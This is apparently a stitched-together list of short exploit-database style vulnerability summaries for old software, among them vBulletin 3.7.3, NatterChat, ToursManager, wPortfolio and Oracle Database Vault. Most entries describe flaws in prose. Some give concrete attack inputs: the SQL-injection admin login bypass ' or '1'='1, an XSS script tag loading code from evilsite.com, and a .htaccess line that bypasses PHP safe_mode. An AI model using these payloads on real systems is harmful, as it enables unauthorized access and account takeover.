Vcalendar_asp is vulnerable to an MDB file download vulnerability. An attacker can download the MDB file from the server and read the admin name and password from the 'users' table. The attacker can then use the credentials to log in to the application.
NATTERCHAT v1.1 is prone to an admin home bypass vulnerability. An attacker can exploit this issue to gain access to the administrative panel without authentication. This may lead to further attacks.
Deny of service occurs during parsing of included compressed streams (gotta use bdc.exe /arc option) in cause of using /FlateDecode /ASCIIHexDecode compression options and object tag /JavaScript in pdf. From time to time occurs either DoS with rewriting of arithmetic registers with the contents of user's decrypted buffer or an infinite loop during scanning after modifying stream-buffer we have such results: 775781CB 8B49 04 MOV ECX,DWORD PTR DS:[ECX+4] Access violation when reading [30333037] - use Shift+F7/F8/F9 to pass exception to program EAX 04354E20 ECX 30333033 EDX 30333033 EBX 01BF0000 ESP 0012D5B8 EBP 0012D5E0 ESI 04354E18 EDI 04352100 EIP 775781CB ntdll.775781CB
This exploit is used to disable the Oracle Database Vault runtime. It is tested on 10.2.0.3 and CentOS 5. It requires the user to have access to the oracle user process space and requires BFD headers and library (binutils-devel). It also requires ptrace() to be enabled and working.
ToursManager PhP Script is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries in the 'tourid' parameter of the 'tourview.php' script. By manipulating the 'tourid' parameter, an attacker can execute arbitrary SQL queries in the application's database. This can be exploited to manipulate SQL queries, and disclose sensitive information from the database, such as usernames and passwords.
Go to the Login page http://www.site.il/chat/nattechat/home.asp and enter Username: admin and Password: ' or '1'='1 to bypass authentication.
A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included with the visitor messages addon (a clone of a social network wall/comment area). When posting XSS, the data is run through htmlentities(); before being displayed to the general public/forum members. However, when posting a new message, a new notification is sent to the commentee. The commenter posts a XSS vector such as <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available and an example worm is included that makes the user post a new thread with a specified subject and message.
Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp, enter Username: admin and Password: ' or '1'='1. This will bypass the login page as the query is always true.
The main problem is between using safe_mode in global mode and declaring via php_admin_flag. When a php script is created in /www/ and an attempt is made to call ini_set("error_log", "/hack/"), a warning is generated. However, if php_admin_flag safe_mode On is used in httpd.conf, only a warning is generated and the syntax in .htaccess php_value error_log "/hack/blehx.php" is allowed and bypasses safe_mode.
wPortfolio is a free and open source web-based application written in PHP, designed to help you easily create and maintain your own portfolio website. A vulnerability exists in wPortfolio version 0.3 which allows an attacker to change the admin password. This can be exploited by sending a specially crafted HTTP POST request to the 'admin.php' script with the 'action' parameter set to 'change_password' and the 'password' parameter set to the new password.
Services By CQR